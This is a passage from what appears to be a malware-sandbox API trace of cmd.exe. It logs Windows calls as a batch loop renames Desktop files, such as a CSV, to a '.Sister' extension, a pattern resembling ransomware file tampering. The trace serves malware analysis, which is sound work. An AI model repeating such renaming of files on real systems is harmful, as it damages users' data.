lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0189.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.718] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956f6c0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed956f6c0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0189.792] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"WDqhYWbTT.csv\" \"WDqhYWbTT.csv.Sister\" ") returned 40 [0189.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.792] GetFileType (hFile=0x50) returned 0x2 [0189.792] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0189.792] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0189.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.881] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x28, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x28) returned 1 [0189.974] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0189.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.974] GetFileType (hFile=0x50) returned 0x2 [0189.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0189.974] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0190.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.071] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0190.330] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0190.330] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.330] GetFileType (hFile=0x50) returned 0x2 [0190.330] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0190.330] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0190.418] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.418] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0190.500] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0190.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.500] GetFileType (hFile=0x50) returned 0x2 [0190.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0190.500] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0190.572] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.572] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0190.642] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0190.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.642] GetFileType (hFile=0x50) returned 0x2 [0190.642] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0190.642] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0190.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.717] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0190.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.800] GetFileType (hFile=0x50) returned 0x2 [0190.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0190.800] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0190.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.889] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956fb00*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed956fb00*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0190.960] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.bat\" ") returned 40 [0190.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0190.960] GetFileType (hFile=0x50) returned 0x2 [0190.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0190.960] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0191.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.030] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x28, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x28) returned 1 [0191.102] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0191.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.102] GetFileType (hFile=0x50) returned 0x2 [0191.102] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0191.102] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0191.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.238] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0191.325] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0191.456] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0191.456] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0191.456] malloc (_Size=0xffce) returned 0x21ed96dfdc0 [0191.456] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0191.456] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0191.457] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0191.457] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0191.457] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0191.457] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0191.457] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0191.457] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0191.457] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0191.457] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0191.457] ??_V@YAXPEAX@Z () returned 0x1 [0191.457] GetProcessHeap () returned 0x21ed8c70000 [0191.457] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed937d450 [0191.457] GetProcessHeap () returned 0x21ed8c70000 [0191.457] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937d450, Size=0x60) returned 0x21ed8d64030 [0191.457] GetProcessHeap () returned 0x21ed8c70000 [0191.457] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64030) returned 0x60 [0191.458] GetProcessHeap () returned 0x21ed8c70000 [0191.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x68) returned 0x21ed8d64110 [0191.458] GetProcessHeap () returned 0x21ed8c70000 [0191.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed937d450 [0191.458] GetProcessHeap () returned 0x21ed8c70000 [0191.458] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937d450, Size=0x60) returned 0x21ed8d640a0 [0191.458] GetProcessHeap () returned 0x21ed8c70000 [0191.458] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d640a0) returned 0x60 [0191.458] malloc (_Size=0xffce) returned 0x21ed96dfdc0 [0191.458] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0191.458] GetProcessHeap () returned 0x21ed8c70000 [0191.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64b60 [0191.458] GetProcessHeap () returned 0x21ed8c70000 [0191.458] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955b200 [0191.458] _wcsicmp (_String1="WDqhYWbTT.csv", _String2=".") returned 73 [0191.458] _wcsicmp (_String1="WDqhYWbTT.csv", _String2="..") returned 73 [0191.459] GetFileAttributesW (lpFileName="WDqhYWbTT.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\wdqhywbtt.csv")) returned 0x20 [0191.459] GetProcessHeap () returned 0x21ed8c70000 [0191.459] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed99d0030 [0191.461] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed99d0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0191.461] SetErrorMode (uMode=0x0) returned 0x0 [0191.461] SetErrorMode (uMode=0x1) returned 0x0 [0191.461] GetFullPathNameW (in: lpFileName="WDqhYWbTT.csv", nBufferLength=0x7fe7, lpBuffer=0x21ed96dfdc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WDqhYWbTT.csv", lpFilePart=0xa6cf4fd660*="WDqhYWbTT.csv") returned 0x25 [0191.461] SetErrorMode (uMode=0x0) returned 0x1 [0191.461] GetProcessHeap () returned 0x21ed8c70000 [0191.461] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955ca60 [0191.462] _wcsicmp (_String1="WDqhYWbTT.csv", _String2=".") returned 73 [0191.462] _wcsicmp (_String1="WDqhYWbTT.csv", _String2="..") returned 73 [0191.462] GetFileAttributesW (lpFileName="WDqhYWbTT.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\wdqhywbtt.csv")) returned 0x20 [0191.462] ??_V@YAXPEAX@Z () returned 0x1 [0191.462] malloc (_Size=0xffce) returned 0x21ed96dfdc0 [0191.462] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0191.462] malloc (_Size=0xffce) returned 0x21ed96efda0 [0191.462] ??_V@YAXPEAX@Z () returned 0x21ed96efda0 [0191.463] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WDqhYWbTT.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\wdqhywbtt.csv")) returned 0x20 [0191.463] malloc (_Size=0xffce) returned 0x21ed923fd00 [0191.463] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0191.463] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WDqhYWbTT.csv", fInfoLevelId=0x1, lpFindFileData=0x21ed955b210, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed955b210) returned 0x21ed8d64bc0 [0191.464] malloc (_Size=0xffce) returned 0x21ed924fce0 [0191.464] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0191.464] ??_V@YAXPEAX@Z () returned 0x1 [0191.464] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\WDqhYWbTT.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\wdqhywbtt.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\WDqhYWbTT.csv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\wdqhywbtt.csv.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0191.504] FindNextFileW (in: hFindFile=0x21ed8d64bc0, lpFindFileData=0x21ed955b210 | out: lpFindFileData=0x21ed955b210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a867490, ftCreationTime.dwHighDateTime=0x1d5e872, ftLastAccessTime.dwLowDateTime=0x264895d0, ftLastAccessTime.dwHighDateTime=0x1d5e870, ftLastWriteTime.dwLowDateTime=0x264895d0, ftLastWriteTime.dwHighDateTime=0x1d5e870, nFileSizeHigh=0x0, nFileSizeLow=0x12425, dwReserved0=0x0, dwReserved1=0x0, cFileName="WDqhYWbTT.csv", cAlternateFileName="")) returned 0 [0191.506] GetLastError () returned 0x12 [0191.506] FindClose (in: hFindFile=0x21ed8d64bc0 | out: hFindFile=0x21ed8d64bc0) returned 1 [0191.506] ??_V@YAXPEAX@Z () returned 0x1 [0191.506] ??_V@YAXPEAX@Z () returned 0x1 [0191.506] ??_V@YAXPEAX@Z () returned 0x1 [0191.506] ??_V@YAXPEAX@Z () returned 0x1 [0191.509] GetProcessHeap () returned 0x21ed8c70000 [0191.509] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64bc0 [0191.509] GetProcessHeap () returned 0x21ed8c70000 [0191.509] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95b80, Size=0x16) returned 0x21ed8c95ae0 [0191.509] GetProcessHeap () returned 0x21ed8c70000 [0191.509] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ae0) returned 0x16 [0191.510] GetProcessHeap () returned 0x21ed8c70000 [0191.510] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0191.510] GetProcessHeap () returned 0x21ed8c70000 [0191.510] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0191.510] GetProcessHeap () returned 0x21ed8c70000 [0191.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6c130 [0191.510] GetProcessHeap () returned 0x21ed8c70000 [0191.510] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c130, Size=0xb2) returned 0x21ed8d6c130 [0191.510] GetProcessHeap () returned 0x21ed8c70000 [0191.510] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c130) returned 0xb2 [0191.510] GetProcessHeap () returned 0x21ed8c70000 [0191.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956fc90 [0191.510] GetProcessHeap () returned 0x21ed8c70000 [0191.510] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956fc90, Size=0x30) returned 0x21ed956fc90 [0191.511] GetProcessHeap () returned 0x21ed8c70000 [0191.511] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956fc90) returned 0x30 [0191.511] GetProcessHeap () returned 0x21ed8c70000 [0191.511] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956fcd0 [0191.511] malloc (_Size=0x1ff9c) returned 0x21ed96dfdc0 [0191.514] GetProcessHeap () returned 0x21ed8c70000 [0191.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d450 [0191.514] GetProcessHeap () returned 0x21ed8c70000 [0191.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937d5d0 [0191.515] ??_V@YAXPEAX@Z () returned 0x1 [0191.515] malloc (_Size=0x1ff9c) returned 0x21ed96dfdc0 [0191.515] GetProcessHeap () returned 0x21ed8c70000 [0191.515] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937dc90 [0191.515] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed96dfdc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0191.515] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64c20 [0191.515] FindClose (in: hFindFile=0x21ed8d64c20 | out: hFindFile=0x21ed8d64c20) returned 1 [0191.515] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64c20 [0191.516] FindClose (in: hFindFile=0x21ed8d64c20 | out: hFindFile=0x21ed8d64c20) returned 1 [0191.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9cbb2587, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9cbb2587, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65340 [0191.516] FindClose (in: hFindFile=0x21ed8d65340 | out: hFindFile=0x21ed8d65340) returned 1 [0191.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9cbb2587, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9cbb2587, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0191.517] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0191.517] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0191.519] GetProcessHeap () returned 0x21ed8c70000 [0191.519] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67bb0 [0191.519] ??_V@YAXPEAX@Z () returned 0x1 [0191.519] ??_V@YAXPEAX@Z () returned 0x1 [0191.519] GetProcessHeap () returned 0x21ed8c70000 [0191.519] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956fcd0, Size=0x490) returned 0x21ed956fcd0 [0191.519] GetProcessHeap () returned 0x21ed8c70000 [0191.519] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956fcd0) returned 0x490 [0191.519] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0191.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.519] GetFileType (hFile=0x50) returned 0x2 [0191.519] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0191.519] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0191.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.592] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0191.674] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0191.674] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0191.674] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0191.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.674] GetFileType (hFile=0x50) returned 0x2 [0191.674] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0191.675] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0191.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.746] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0191.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.820] GetFileType (hFile=0x50) returned 0x2 [0191.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0191.820] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0191.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.907] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956fca0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed956fca0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0191.979] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0191.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0191.979] GetFileType (hFile=0x50) returned 0x2 [0191.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0191.979] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0192.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0192.049] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0192.246] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0192.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0192.246] GetFileType (hFile=0x50) returned 0x2 [0192.246] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0192.246] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0192.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0192.324] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0192.417] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0192.627] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0192.627] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0192.628] malloc (_Size=0xffce) returned 0x21ed96dfdc0 [0192.628] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0192.628] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0192.628] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0192.628] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0192.628] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0192.628] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0192.628] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0192.628] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0192.628] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0192.628] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0192.628] ??_V@YAXPEAX@Z () returned 0x1 [0192.628] GetProcessHeap () returned 0x21ed8c70000 [0192.628] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6c200 [0192.628] GetProcessHeap () returned 0x21ed8c70000 [0192.628] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c200, Size=0x130) returned 0x21ed8d6c200 [0192.628] GetProcessHeap () returned 0x21ed8c70000 [0192.628] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c200) returned 0x130 [0192.628] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0192.629] malloc (_Size=0xffce) returned 0x21ed96dfdc0 [0192.629] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0192.629] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0192.629] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed96dfdc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, 